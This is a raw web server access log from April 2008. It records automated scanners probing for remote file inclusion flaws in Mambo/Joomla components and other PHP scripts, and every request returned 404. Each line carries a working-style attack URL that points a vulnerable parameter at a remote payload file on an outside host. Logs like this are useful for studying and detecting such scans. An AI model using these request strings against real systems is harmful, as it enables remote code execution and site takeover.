64.185.237.35 - - [06/Apr/2008:17:50:52 -0600] "GET /logs/error_log.20080203/administrator/components/com_a6mambocredits/admin.a6mambocredits.php?mosConfig_live_site=http://ezsm.ru/media/id.txt??? HTTP/1.1" 404 298 "-" "libwww-perl/5.808"
64.185.237.35 - - [06/Apr/2008:17:50:53 -0600] "GET /administrator/components/com_a6mambocredits/admin.a6mambocredits.php?mosConfig_live_site=http://ezsm.ru/media/id.txt??? HTTP/1.1" 404 274 "-" "libwww-perl/5.808"
64.185.237.35 - - [06/Apr/2008:17:50:54 -0600] "GET /logs/administrator/components/com_a6mambocredits/admin.a6mambocredits.php?mosConfig_live_site=http://ezsm.ru/media/id.txt??? HTTP/1.1" 404 279 "-" "libwww-perl/5.808"
64.185.237.35 - - [06/Apr/2008:17:51:06 -0600] "GET /logs/error_log.20080203/administrator/components/com_a6mambocredits/admin.a6mambocredits.php?mosConfig_live_site=http://ezsm.ru/media/id.txt??? HTTP/1.1" 404 298 "-" "libwww-perl/5.808"
64.185.237.35 - - [06/Apr/2008:17:51:07 -0600] "GET /administrator/components/com_a6mambocredits/admin.a6mambocredits.php?mosConfig_live_site=http://ezsm.ru/media/id.txt??? HTTP/1.1" 404 274 "-" "libwww-perl/5.808"
64.185.237.35 - - [06/Apr/2008:17:51:08 -0600] "GET /logs/administrator/components/com_a6mambocredits/admin.a6mambocredits.php?mosConfig_live_site=http://ezsm.ru/media/id.txt??? HTTP/1.1" 404 279 "-" "libwww-perl/5.808"
64.185.237.35 - - [06/Apr/2008:17:51:09 -0600] "GET /logs/error_log.20080203/administrator/components/com_a6mambocredits/admin.a6mambocredits.php?mosConfig_live_site=http://ezsm.ru/media/id.txt??? HTTP/1.1" 404 298 "-" "libwww-perl/5.808"
64.185.237.35 - - [06/Apr/2008:17:51:10 -0600] "GET /administrator/components/com_a6mambocredits/admin.a6mambocredits.php?mosConfig_live_site=http://ezsm.ru/media/id.txt??? HTTP/1.1" 404 274 "-" "libwww-perl/5.808"
64.185.237.35 - - [06/Apr/2008:17:51:11 -0600] "GET /logs/error_log.20080203/administrator/components/com_a6mambocredits/admin.a6mambocredits.php?mosConfig_live_site=http://ezsm.ru/media/id.txt??? HTTP/1.1" 404 298 "-" "libwww-perl/5.808"
64.185.237.35 - - [06/Apr/2008:17:51:11 -0600] "GET /logs/administrator/components/com_a6mambocredits/admin.a6mambocredits.php?mosConfig_live_site=http://ezsm.ru/media/id.txt??? HTTP/1.1" 404 279 "-" "libwww-perl/5.808"
64.185.237.35 - - [06/Apr/2008:17:51:12 -0600] "GET /administrator/components/com_a6mambocredits/admin.a6mambocredits.php?mosConfig_live_site=http://ezsm.ru/media/id.txt??? HTTP/1.1" 404 274 "-" "libwww-perl/5.808"
64.185.237.35 - - [06/Apr/2008:17:51:13 -0600] "GET /logs/administrator/components/com_a6mambocredits/admin.a6mambocredits.php?mosConfig_live_site=http://ezsm.ru/media/id.txt??? HTTP/1.1" 404 279 "-" "libwww-perl/5.808"
64.185.237.35 - - [06/Apr/2008:17:51:18 -0600] "GET /logs/error_log.20080203/administrator/components/com_a6mambocredits/admin.a6mambocredits.php?mosConfig_live_site=http://ezsm.ru/media/id.txt??? HTTP/1.1" 404 298 "-" "libwww-perl/5.808"
64.185.237.35 - - [06/Apr/2008:17:51:18 -0600] "GET /administrator/components/com_a6mambocredits/admin.a6mambocredits.php?mosConfig_live_site=http://ezsm.ru/media/id.txt??? HTTP/1.1" 404 274 "-" "libwww-perl/5.808"
64.185.237.35 - - [06/Apr/2008:17:51:19 -0600] "GET /logs/administrator/components/com_a6mambocredits/admin.a6mambocredits.php?mosConfig_live_site=http://ezsm.ru/media/id.txt??? HTTP/1.1" 404 279 "-" "libwww-perl/5.808"
69.9.37.130 - - [06/Apr/2008:17:52:02 -0600] "GET /administrator/components/com_a6mambocredits/admin.a6mambocredits.php?mosConfig_live_site=http://family.kloetstra.com/genealogya/photos/headstones/errorlink/test.txt??? HTTP/1.1" 404 274 "-" "Mozilla/4.61 (Macintosh; I; PPC)"
69.9.37.130 - - [06/Apr/2008:17:52:02 -0600] "GET /logs/administrator/components/com_a6mambocredits/admin.a6mambocredits.php?mosConfig_live_site=http://family.kloetstra.com/genealogya/photos/headstones/errorlink/test.txt??? HTTP/1.1" 404 279 "-" "Mozilla/4.61 (Macintosh; I; PPC)"
58.65.235.209 - - [06/Apr/2008:17:52:23 -0600] "GET /logs/access_log.20071223 HTTP/1.0" 404 218 "-" "-"
64.185.237.35 - - [06/Apr/2008:17:53:54 -0600] "GET /logs/access_log.20080203/administrator/components/com_a6mambocredits/admin.a6mambocredits.php?mosConfig_live_site=http://ezsm.ru/media/id.txt??? HTTP/1.1" 404 299 "-" "libwww-perl/5.808"
64.185.237.35 - - [06/Apr/2008:17:54:14 -0600] "GET /logs/access_log.20080203/administrator/components/com_a6mambocredits/admin.a6mambocredits.php?mosConfig_live_site=http://ezsm.ru/media/id.txt??? HTTP/1.1" 404 299 "-" "libwww-perl/5.808"
64.185.237.35 - - [06/Apr/2008:17:54:17 -0600] "GET /logs/access_log.20080203/administrator/components/com_a6mambocredits/admin.a6mambocredits.php?mosConfig_live_site=http://ezsm.ru/media/id.txt??? HTTP/1.1" 404 299 "-" "libwww-perl/5.808"
64.185.237.35 - - [06/Apr/2008:17:54:22 -0600] "GET /logs/access_log.20080203/administrator/components/com_a6mambocredits/admin.a6mambocredits.php?mosConfig_live_site=http://ezsm.ru/media/id.txt??? HTTP/1.1" 404 299 "-" "libwww-perl/5.808"
64.185.237.35 - - [06/Apr/2008:17:54:23 -0600] "GET /logs/access_log.20080203/administrator/components/com_a6mambocredits/admin.a6mambocredits.php?mosConfig_live_site=http://ezsm.ru/media/id.txt??? HTTP/1.1" 404 299 "-" "libwww-perl/5.808"
64.185.237.35 - - [06/Apr/2008:17:55:02 -0600] "GET /logs/access_log.2008020316/components/com_galleria/galleria.html.php?mosConfig_absolute_path=http://ezsm.ru/media/id.txt??? HTTP/1.1" 404 274 "-" "libwww-perl/5.808"
64.185.237.35 - - [06/Apr/2008:17:55:02 -0600] "GET /components/com_galleria/galleria.html.php?mosConfig_absolute_path=http://ezsm.ru/media/id.txt??? HTTP/1.1" 404 247 "-" "libwww-perl/5.808"
64.185.237.35 - - [06/Apr/2008:17:55:02 -0600] "GET /logs/components/com_galleria/galleria.html.php?mosConfig_absolute_path=http://ezsm.ru/media/id.txt??? HTTP/1.1" 404 252 "-" "libwww-perl/5.808"
64.185.237.35 - - [06/Apr/2008:17:55:03 -0600] "GET /logs/access_log.2008020316/components/com_galleria/galleria.html.php?mosConfig_absolute_path=http://ezsm.ru/media/id.txt??? HTTP/1.1" 404 274 "-" "libwww-perl/5.808"
64.185.237.35 - - [06/Apr/2008:17:55:03 -0600] "GET /components/com_galleria/galleria.html.php?mosConfig_absolute_path=http://ezsm.ru/media/id.txt??? HTTP/1.1" 404 247 "-" "libwww-perl/5.808"
64.185.237.35 - - [06/Apr/2008:17:55:03 -0600] "GET /logs/components/com_galleria/galleria.html.php?mosConfig_absolute_path=http://ezsm.ru/media/id.txt??? HTTP/1.1" 404 252 "-" "libwww-perl/5.808"
64.185.237.35 - - [06/Apr/2008:17:55:07 -0600] "GET /logs/access_log.2008020316/components/com_galleria/galleria.html.php?mosConfig_absolute_path=http://ezsm.ru/media/id.txt??? HTTP/1.1" 404 274 "-" "libwww-perl/5.808"
64.185.237.35 - - [06/Apr/2008:17:55:07 -0600] "GET /logs/access_log.2008020316/components/com_galleria/galleria.html.php?mosConfig_absolute_path=http://ezsm.ru/media/id.txt??? HTTP/1.1" 404 274 "-" "libwww-perl/5.808"
64.185.237.35 - - [06/Apr/2008:17:55:07 -0600] "GET /components/com_galleria/galleria.html.php?mosConfig_absolute_path=http://ezsm.ru/media/id.txt??? HTTP/1.1" 404 247 "-" "libwww-perl/5.808"
64.185.237.35 - - [06/Apr/2008:17:55:07 -0600] "GET /components/com_galleria/galleria.html.php?mosConfig_absolute_path=http://ezsm.ru/media/id.txt??? HTTP/1.1" 404 247 "-" "libwww-perl/5.808"
64.185.237.35 - - [06/Apr/2008:17:55:07 -0600] "GET /logs/components/com_galleria/galleria.html.php?mosConfig_absolute_path=http://ezsm.ru/media/id.txt??? HTTP/1.1" 404 252 "-" "libwww-perl/5.808"
64.185.237.35 - - [06/Apr/2008:17:55:07 -0600] "GET /logs/components/com_galleria/galleria.html.php?mosConfig_absolute_path=http://ezsm.ru/media/id.txt??? HTTP/1.1" 404 252 "-" "libwww-perl/5.808"
64.185.237.35 - - [06/Apr/2008:17:55:11 -0600] "GET /logs/access_log.2008020316/components/com_galleria/galleria.html.php?mosConfig_absolute_path=http://ezsm.ru/media/id.txt??? HTTP/1.1" 404 274 "-" "libwww-perl/5.808"
64.185.237.35 - - [06/Apr/2008:17:55:11 -0600] "GET /components/com_galleria/galleria.html.php?mosConfig_absolute_path=http://ezsm.ru/media/id.txt??? HTTP/1.1" 404 247 "-" "libwww-perl/5.808"
64.185.237.35 - - [06/Apr/2008:17:55:11 -0600] "GET /logs/components/com_galleria/galleria.html.php?mosConfig_absolute_path=http://ezsm.ru/media/id.txt??? HTTP/1.1" 404 252 "-" "libwww-perl/5.808"
202.29.32.2 - - [06/Apr/2008:17:56:56 -0600] "GET /logs/administrator/components/com_a6mambocredits/admin.a6mambocredits.php?mosConfig_live_site=http://ezsm.ru/media/id.txt??? HTTP/1.1" 404 279 "-" "libwww-perl/5.805"
202.29.32.2 - - [06/Apr/2008:17:56:57 -0600] "GET /administrator/components/com_a6mambocredits/admin.a6mambocredits.php?mosConfig_live_site=http://ezsm.ru/media/id.txt??? HTTP/1.1" 404 274 "-" "libwww-perl/5.805"
202.29.32.2 - - [06/Apr/2008:17:57:09 -0600] "GET /logs/administrator/components/com_a6mambocredits/admin.a6mambocredits.php?mosConfig_live_site=http://sp4ghy.iifree.net/on.txt?? HTTP/1.1" 404 279 "-" "libwww-perl/5.805"
202.29.32.2 - - [06/Apr/2008:17:57:10 -0600] "GET /administrator/components/com_a6mambocredits/admin.a6mambocredits.php?mosConfig_live_site=http://sp4ghy.iifree.net/on.txt?? HTTP/1.1" 404 274 "-" "libwww-perl/5.805"
59.126.172.129 - - [06/Apr/2008:17:58:46 -0600] "GET /logs/error_log//admin/business_inc/saveserver.php?thisdir=http://lineagezone.hopto.org/je/safe.txt?? HTTP/1.1" 404 255 "-" "libwww-perl/5.803"
59.126.172.129 - - [06/Apr/2008:17:58:47 -0600] "GET //admin/business_inc/saveserver.php?thisdir=http://lineagezone.hopto.org/je/safe.txt?? HTTP/1.1" 404 240 "-" "libwww-perl/5.803"
59.126.172.129 - - [06/Apr/2008:17:58:48 -0600] "GET /logs//admin/business_inc/saveserver.php?thisdir=http://lineagezone.hopto.org/je/safe.txt?? HTTP/1.1" 404 245 "-" "libwww-perl/5.803"
216.246.192.39 - - [06/Apr/2008:17:59:02 -0600] "GET /logs/error_log/include/Classes.inc.php?tm_includepath=http://www.sdmetal.org/prod//modules/SPChat/images/id.txt?? HTTP/1.1" 404 244 "-" "libwww-perl/5.808"
216.246.192.39 - - [06/Apr/2008:17:59:02 -0600] "GET /include/Classes.inc.php?tm_includepath=http://www.sdmetal.org/prod//modules/SPChat/images/id.txt?? HTTP/1.1" 404 229 "-" "libwww-perl/5.808"
216.246.192.39 - - [06/Apr/2008:17:59:03 -0600] "GET /logs/include/Classes.inc.php?tm_includepath=http://www.sdmetal.org/prod//modules/SPChat/images/id.txt?? HTTP/1.1" 404 234 "-" "libwww-perl/5.808"
59.126.172.129 - - [06/Apr/2008:17:59:11 -0600] "GET /logs/access_log//admin/business_inc/saveserver.php?thisdir=http://lineagezone.hopto.org/je/safe.txt?? HTTP/1.1" 404 256 "-" "libwww-perl/5.803"
211.21.215.250 - - [06/Apr/2008:18:00:18 -0600] "GET /logs/access_log.2008020316//components/com_galleria/galleria.html.php?mosConfig_absolute_path=http://www.anje.pt/echo2.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79"
211.21.215.250 - - [06/Apr/2008:18:00:19 -0600] "GET /logs/access_log.2008020316//components/com_galleria/galleria.html.php?mosConfig_absolute_path=http://www.anje.pt/echo2.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79"
211.21.215.250 - - [06/Apr/2008:18:00:21 -0600] "GET //components/com_galleria/galleria.html.php?mosConfig_absolute_path=http://www.anje.pt/echo2.txt? HTTP/1.1" 404 248 "-" "libwww-perl/5.79"
211.21.215.250 - - [06/Apr/2008:18:00:22 -0600] "GET //components/com_galleria/galleria.html.php?mosConfig_absolute_path=http://www.anje.pt/echo2.txt? HTTP/1.1" 404 248 "-" "libwww-perl/5.79"
211.21.215.250 - - [06/Apr/2008:18:00:26 -0600] "GET /logs//components/com_galleria/galleria.html.php?mosConfig_absolute_path=http://www.anje.pt/echo2.txt? HTTP/1.1" 404 253 "-" "libwww-perl/5.79"
211.21.215.250 - - [06/Apr/2008:18:00:28 -0600] "GET /logs//components/com_galleria/galleria.html.php?mosConfig_absolute_path=http://www.anje.pt/echo2.txt? HTTP/1.1" 404 253 "-" "libwww-perl/5.79"
64.185.237.35 - - [06/Apr/2008:18:00:47 -0600] "GET /logs/access_log.2008020316/components/com_galleria/galleria.html.php?mosConfig_absolute_path=http://ezsm.ru/media/id.txt??? HTTP/1.1" 404 274 "-" "libwww-perl/5.808"
64.185.237.35 - - [06/Apr/2008:18:00:50 -0600] "GET /components/com_galleria/galleria.html.php?mosConfig_absolute_path=http://ezsm.ru/media/id.txt??? HTTP/1.1" 404 247 "-" "libwww-perl/5.808"
64.185.237.35 - - [06/Apr/2008:18:00:52 -0600] "GET /logs/components/com_galleria/galleria.html.php?mosConfig_absolute_path=http://ezsm.ru/media/id.txt??? HTTP/1.1" 404 252 "-" "libwww-perl/5.808"
64.185.237.35 - - [06/Apr/2008:18:00:54 -0600] "GET /logs/access_log.2008020316/components/com_galleria/galleria.html.php?mosConfig_absolute_path=http://ezsm.ru/media/id.txt??? HTTP/1.1" 404 274 "-" "libwww-perl/5.808"
64.185.237.35 - - [06/Apr/2008:18:00:55 -0600] "GET /logs/access_log.2008020316/components/com_galleria/galleria.html.php?mosConfig_absolute_path=http://ezsm.ru/media/id.txt??? HTTP/1.1" 404 274 "-" "libwww-perl/5.808"
64.185.237.35 - - [06/Apr/2008:18:00:57 -0600] "GET /components/com_galleria/galleria.html.php?mosConfig_absolute_path=http://ezsm.ru/media/id.txt??? HTTP/1.1" 404 247 "-" "libwww-perl/5.808"
64.185.237.35 - - [06/Apr/2008:18:00:58 -0600] "GET /components/com_galleria/galleria.html.php?mosConfig_absolute_path=http://ezsm.ru/media/id.txt??? HTTP/1.1" 404 247 "-" "libwww-perl/5.808"
64.185.237.35 - - [06/Apr/2008:18:00:59 -0600] "GET /logs/components/com_galleria/galleria.html.php?mosConfig_absolute_path=http://ezsm.ru/media/id.txt??? HTTP/1.1" 404 252 "-" "libwww-perl/5.808"
64.185.237.35 - - [06/Apr/2008:18:01:00 -0600] "GET /logs/components/com_galleria/galleria.html.php?mosConfig_absolute_path=http://ezsm.ru/media/id.txt??? HTTP/1.1" 404 252 "-" "libwww-perl/5.808"
64.185.237.35 - - [06/Apr/2008:18:01:08 -0600] "GET /logs/access_log.2008020316/components/com_galleria/galleria.html.php?mosConfig_absolute_path=http://ezsm.ru/media/id.txt??? HTTP/1.1" 404 274 "-" "libwww-perl/5.808"
64.185.237.35 - - [06/Apr/2008:18:01:09 -0600] "GET /logs/access_log.2008020316/components/com_galleria/galleria.html.php?mosConfig_absolute_path=http://ezsm.ru/media/id.txt??? HTTP/1.1" 404 274 "-" "libwww-perl/5.808"
64.185.237.35 - - [06/Apr/2008:18:01:10 -0600] "GET /components/com_galleria/galleria.html.php?mosConfig_absolute_path=http://ezsm.ru/media/id.txt??? HTTP/1.1" 404 247 "-" "libwww-perl/5.808"
64.185.237.35 - - [06/Apr/2008:18:01:11 -0600] "GET /components/com_galleria/galleria.html.php?mosConfig_absolute_path=http://ezsm.ru/media/id.txt??? HTTP/1.1" 404 247 "-" "libwww-perl/5.808"
64.185.237.35 - - [06/Apr/2008:18:01:13 -0600] "GET /logs/components/com_galleria/galleria.html.php?mosConfig_absolute_path=http://ezsm.ru/media/id.txt??? HTTP/1.1" 404 252 "-" "libwww-perl/5.808"
64.185.237.35 - - [06/Apr/2008:18:01:14 -0600] "GET /logs/components/com_galleria/galleria.html.php?mosConfig_absolute_path=http://ezsm.ru/media/id.txt??? HTTP/1.1" 404 252 "-" "libwww-perl/5.808"
216.246.192.39 - - [06/Apr/2008:18:01:24 -0600] "GET /logs/access_log/include/Classes.inc.php?tm_includepath=http://www.sdmetal.org/prod//modules/SPChat/images/id.txt?? HTTP/1.1" 404 245 "-" "libwww-perl/5.808"
75.125.145.66 - - [06/Apr/2008:18:04:08 -0600] "GET /main.php?a=http://m4r0c.com/rfi-scan/test.txt??? HTTP/1.1" 404 226 "-" "Mozilla/5.0 (Windows; U; Windows CE 4.21; rv:1.8b4) Gecko/20050720 Minimo/0.007"
75.125.145.66 - - [06/Apr/2008:18:04:09 -0600] "GET /logs/main.php?a=http://m4r0c.com/rfi-scan/test.txt??? HTTP/1.1" 404 231 "-" "Mozilla/5.0 (Windows; U; Windows CE 4.21; rv:1.8b4) Gecko/20050720 Minimo/0.007"
200.139.131.212 - - [06/Apr/2008:18:06:18 -0600] "GET /logs//administrator/components/com_a6mambocredits/admin.a6mambocredits.php?mosConfig_live_site=http://www.anje.pt/echo2.txt? HTTP/1.1" 404 280 "-" "libwww-perl/5.808"
200.139.131.212 - - [06/Apr/2008:18:06:21 -0600] "GET //administrator/components/com_a6mambocredits/admin.a6mambocredits.php?mosConfig_live_site=http://www.anje.pt/echo2.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808"
75.125.145.66 - - [06/Apr/2008:18:08:16 -0600] "GET //ecommerce/payment/cybersource.php?path[docroot]=http://m4r0c.com/rfi-scan/test.txt??? HTTP/1.1" 404 240 "-" "Mozilla/5.0 (Windows; U; Windows CE 4.21; rv:1.8b4) Gecko/20050720 Minimo/0.007"
75.125.145.66 - - [06/Apr/2008:18:08:16 -0600] "GET /logs//ecommerce/payment/cybersource.php?path[docroot]=http://m4r0c.com/rfi-scan/test.txt??? HTTP/1.1" 404 245 "-" "Mozilla/5.0 (Windows; U; Windows CE 4.21; rv:1.8b4) Gecko/20050720 Minimo/0.007"
205.234.253.11 - - [06/Apr/2008:18:10:34 -0600] "GET /logs/access_log.20080127/template.php?pagina=http://www.dosbrteam.com.br/id.txt??? HTTP/1.1" 404 243 "-" "libwww-perl/5.808"
205.234.253.11 - - [06/Apr/2008:18:10:36 -0600] "GET /template.php?pagina=http://www.dosbrteam.com.br/id.txt??? HTTP/1.1" 404 230 "-" "libwww-perl/5.808"
205.234.253.11 - - [06/Apr/2008:18:10:39 -0600] "GET /logs/template.php?pagina=http://www.dosbrteam.com.br/id.txt??? HTTP/1.1" 404 235 "-" "libwww-perl/5.808"
64.207.204.13 - - [06/Apr/2008:18:15:00 -0600] "GET /logs/error_log.20080330//components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://geocities.com/d_ibenk/id.txt??? HTTP/1.1" 404 274 "-" "libwww-perl/5.79"
64.207.204.13 - - [06/Apr/2008:18:15:01 -0600] "GET //components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://geocities.com/d_ibenk/id.txt??? HTTP/1.1" 404 250 "-" "libwww-perl/5.79"
64.207.204.13 - - [06/Apr/2008:18:15:01 -0600] "GET /logs//components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://geocities.com/d_ibenk/id.txt??? HTTP/1.1" 404 255 "-" "libwww-perl/5.79"
205.234.253.11 - - [06/Apr/2008:18:15:04 -0600] "GET /logs/access_log/template.php?pagina=http://www.dosbrteam.com.br/id.txt??? HTTP/1.1" 404 234 "-" "libwww-perl/5.808"
212.174.24.65 - - [06/Apr/2008:18:15:50 -0600] "GET //skin/zero_vote/ask_password.php?dir=http://www.prepaidcard.net/id.txt?? HTTP/1.1" 404 238 "-" "libwww-perl/5.805"
212.174.24.65 - - [06/Apr/2008:18:15:53 -0600] "GET /logs//skin/zero_vote/ask_password.php?dir=http://www.prepaidcard.net/id.txt?? HTTP/1.1" 404 243 "-" "libwww-perl/5.805"
64.191.104.52 - - [06/Apr/2008:18:16:27 -0600] "GET /logs/administrator/components/com_mosmedia/includes/info.html.php?mosConfig_absolute_path=http://www.woopss.de/conf/echo? HTTP/1.1" 404 271 "-" "libwww-perl/5.808"
64.191.104.52 - - [06/Apr/2008:18:16:27 -0600] "GET /administrator/components/com_mosmedia/includes/info.html.php?mosConfig_absolute_path=http://www.woopss.de/conf/echo? HTTP/1.1" 404 266 "-" "libwww-perl/5.808"
64.207.204.13 - - [06/Apr/2008:18:17:16 -0600] "GET /logs/access_log.2008020316//components/com_galleria/galleria.html.php?mosConfig_absolute_path=http://geocities.com/d_ibenk/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79"
64.207.204.13 - - [06/Apr/2008:18:17:16 -0600] "GET //components/com_galleria/galleria.html.php?mosConfig_absolute_path=http://geocities.com/d_ibenk/id.txt??? HTTP/1.1" 404 248 "-" "libwww-perl/5.79"
64.207.204.13 - - [06/Apr/2008:18:17:16 -0600] "GET /logs//components/com_galleria/galleria.html.php?mosConfig_absolute_path=http://geocities.com/d_ibenk/id.txt??? HTTP/1.1" 404 253 "-" "libwww-perl/5.79"
205.234.242.100 - - [06/Apr/2008:18:17:50 -0600] "GET /modules/My_eGallery/index.php?basepath=http://www.geocities.com/s.memek/31377os.txt?? HTTP/1.1" 404 235 "-" "libwww-perl/5.808"
205.234.242.100 - - [06/Apr/2008:18:17:50 -0600] "GET /modules/My_eGallery/index.php?basepath=http://www.dfmuses.xpg.com.br/uses/alba.txt? HTTP/1.1" 404 235 "-" "libwww-perl/5.808"
211.21.215.250 - - [06/Apr/2008:18:17:58 -0600] "GET /logs/error_log.20080330//components/com_galleria/galleria.html.php?mosConfig_absolute_path=http://www.anje.pt/echo2.txt? HTTP/1.1" 404 272 "-" "libwww-perl/5.79"
211.21.215.250 - - [06/Apr/2008:18:18:12 -0600] "GET /logs/error_log.20080330//components/com_galleria/galleria.html.php?mosConfig_absolute_path=http://www.anje.pt/echo2.txt? HTTP/1.1" 404 272 "-" "libwww-perl/5.79"
205.234.242.100 - - [06/Apr/2008:18:19:25 -0600] "GET /components/com_galleria/galleria.html.php?mosConfig_absolute_path=http://www.geocities.com/s.memek/31377os.txt?? HTTP/1.1" 404 247 "-" "libwww-perl/5.808"
205.234.242.100 - - [06/Apr/2008:18:19:25 -0600] "GET /components/com_galleria/galleria.html.php?mosConfig_absolute_path=http://www.dfmuses.xpg.com.br/uses/alba.txt? HTTP/1.1" 404 247 "-" "libwww-perl/5.808"
193.23.172.8 - - [06/Apr/2008:18:19:33 -0600] "GET /logs/access_log//agendax/addevent.inc.php?agendax_path=http://www.cdpm3.com/id.txt?? HTTP/1.1" 404 247 "-" "libwww-perl/5.800"
193.23.172.8 - - [06/Apr/2008:18:19:33 -0600] "GET /logs/access_log//agendax/addevent.inc.php?agendax_path=http://www.cdpm3.com/id.txt?? HTTP/1.1" 404 247 "-" "libwww-perl/5.800"
193.23.172.8 - - [06/Apr/2008:18:19:33 -0600] "GET /logs/access_log//agendax/addevent.inc.php?agendax_path=http://www.cdpm3.com/id.txt?? HTTP/1.1" 404 247 "-" "libwww-perl/5.800"
216.246.192.39 - - [06/Apr/2008:18:19:36 -0600] "GET /logs/error_log.20080330//components/com_cpg/cpg.php?mosConfig_absolute_path=http://www.sdmetal.org/prod//modules/SPChat/images/id.txt?? HTTP/1.1" 404 257 "-" "libwww-perl/5.808"
216.246.192.39 - - [06/Apr/2008:18:19:36 -0600] "GET //components/com_cpg/cpg.php?mosConfig_absolute_path=http://www.sdmetal.org/prod//modules/SPChat/images/id.txt?? HTTP/1.1" 404 233 "-" "libwww-perl/5.808"
216.246.192.39 - - [06/Apr/2008:18:19:36 -0600] "GET /logs//components/com_cpg/cpg.php?mosConfig_absolute_path=http://www.sdmetal.org/prod//modules/SPChat/images/id.txt?? HTTP/1.1" 404 238 "-" "libwww-perl/5.808"
203.88.114.169 - - [06/Apr/2008:18:20:15 -0600] "GET /logs//skin/zero_vote/login.php?dir=http://www.citoyennete-active.org/mambots/content/test.txt??? HTTP/1.1" 404 236 "-" "Mozilla/4.0 (compatible; MSIE 5.0; SunOS 5.9 sun4u; X11)"
203.88.114.169 - - [06/Apr/2008:18:20:15 -0600] "GET //skin/zero_vote/login.php?dir=http://www.citoyennete-active.org/mambots/content/test.txt??? HTTP/1.1" 404 231 "-" "Mozilla/4.0 (compatible; MSIE 5.0; SunOS 5.9 sun4u; X11)"
216.246.192.39 - - [06/Apr/2008:18:22:26 -0600] "GET /logs/error_log.20080210//components/com_cpg/cpg.php?mosConfig_absolute_path=http://www.sdmetal.org/prod//modules/SPChat/images/id.txt?? HTTP/1.1" 404 257 "-" "libwww-perl/5.808"
202.29.32.2 - - [06/Apr/2008:18:24:53 -0600] "GET /logs/error_log//components/com_zoom/classes/iptc/EXIF.php?mosConfig_absolute_path=http://www.x-code.co.cc/load.txt?? HTTP/1.1" 404 263 "-" "libwww-perl/5.805"
202.29.32.2 - - [06/Apr/2008:18:24:53 -0600] "GET //components/com_zoom/classes/iptc/EXIF.php?mosConfig_absolute_path=http://www.x-code.co.cc/load.txt?? HTTP/1.1" 404 248 "-" "libwww-perl/5.805"
202.29.32.2 - - [06/Apr/2008:18:24:54 -0600] "GET /logs//components/com_zoom/classes/iptc/EXIF.php?mosConfig_absolute_path=http://www.x-code.co.cc/load.txt?? HTTP/1.1" 404 253 "-" "libwww-perl/5.805"
202.29.32.2 - - [06/Apr/2008:18:25:46 -0600] "GET /logs/error_log//components/com_zoom/classes/iptc/EXIF.php?mosConfig_absolute_path=http://www.x-code.co.cc/load.txt?? HTTP/1.1" 404 263 "-" "libwww-perl/5.805"
202.29.32.2 - - [06/Apr/2008:18:25:47 -0600] "GET //components/com_zoom/classes/iptc/EXIF.php?mosConfig_absolute_path=http://www.x-code.co.cc/load.txt?? HTTP/1.1" 404 248 "-" "libwww-perl/5.805"
202.29.32.2 - - [06/Apr/2008:18:25:47 -0600] "GET /logs//components/com_zoom/classes/iptc/EXIF.php?mosConfig_absolute_path=http://www.x-code.co.cc/load.txt?? HTTP/1.1" 404 253 "-" "libwww-perl/5.805"
205.234.253.11 - - [06/Apr/2008:18:28:51 -0600] "GET /logs/access_log.20080203/main.php?x=http://www.dosbrteam.com.br/id.txt??? HTTP/1.1" 404 239 "-" "libwww-perl/5.808"
205.234.253.11 - - [06/Apr/2008:18:28:52 -0600] "GET /main.php?x=http://www.dosbrteam.com.br/id.txt??? HTTP/1.1" 404 226 "-" "libwww-perl/5.808"
205.234.253.11 - - [06/Apr/2008:18:28:52 -0600] "GET /logs/main.php?x=http://www.dosbrteam.com.br/id.txt??? HTTP/1.1" 404 231 "-" "libwww-perl/5.808"
202.29.32.2 - - [06/Apr/2008:18:29:27 -0600] "GET /logs/components/com_galleria/galleria.html.php?mosConfig_absolute_path=http://sp4ghy.iifree.net/on.txt?? HTTP/1.1" 404 252 "-" "libwww-perl/5.805"
202.29.32.2 - - [06/Apr/2008:18:29:27 -0600] "GET /logs/components/com_galleria/galleria.html.php?mosConfig_absolute_path=http://ezsm.ru/media/id.txt??? HTTP/1.1" 404 252 "-" "libwww-perl/5.805"
202.29.32.2 - - [06/Apr/2008:18:29:27 -0600] "GET /components/com_galleria/galleria.html.php?mosConfig_absolute_path=http://sp4ghy.iifree.net/on.txt?? HTTP/1.1" 404 247 "-" "libwww-perl/5.805"
202.29.32.2 - - [06/Apr/2008:18:29:27 -0600] "GET /components/com_galleria/galleria.html.php?mosConfig_absolute_path=http://ezsm.ru/media/id.txt??? HTTP/1.1" 404 247 "-" "libwww-perl/5.805"
64.207.204.13 - - [06/Apr/2008:18:29:35 -0600] "GET /logs/error_log.20080330//components/com_galleria/galleria.html.php?mosConfig_absolute_path=http://geocities.com/d_ibenk/id.txt??? HTTP/1.1" 404 272 "-" "libwww-perl/5.79"
81.169.176.162 - - [06/Apr/2008:18:29:35 -0600] "GET /administrator/components/com_jreactions/langset.php?comPath=http://www.hitmixwebhosting.de//administrator/components/isis.txt??? HTTP/1.1" 404 257 "-" "Mozilla/5.0 (BeOS; U; BeOS BePC; en-US; rv:1.9a1) Gecko/20051002 Firefox/1.6a1"
81.169.176.162 - - [06/Apr/2008:18:29:35 -0600] "GET /logs/administrator/components/com_jreactions/langset.php?comPath=http://www.hitmixwebhosting.de//administrator/components/isis.txt??? HTTP/1.1" 404 262 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8) Gecko/20060321 Firefox/2.0a1"
64.207.204.13 - - [06/Apr/2008:18:29:36 -0600] "GET /logs/error_log.20080127//components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://geocities.com/d_ibenk/id.txt??? HTTP/1.1" 404 274 "-" "libwww-perl/5.79"
202.29.32.2 - - [06/Apr/2008:18:30:10 -0600] "GET /logs/access_log//components/com_zoom/classes/iptc/EXIF.php?mosConfig_absolute_path=http://www.x-code.co.cc/load.txt?? HTTP/1.1" 404 264 "-" "libwww-perl/5.805"
202.29.32.2 - - [06/Apr/2008:18:30:26 -0600] "GET /logs/access_log//components/com_zoom/classes/iptc/EXIF.php?mosConfig_absolute_path=http://www.x-code.co.cc/load.txt?? HTTP/1.1" 404 264 "-" "libwww-perl/5.805"
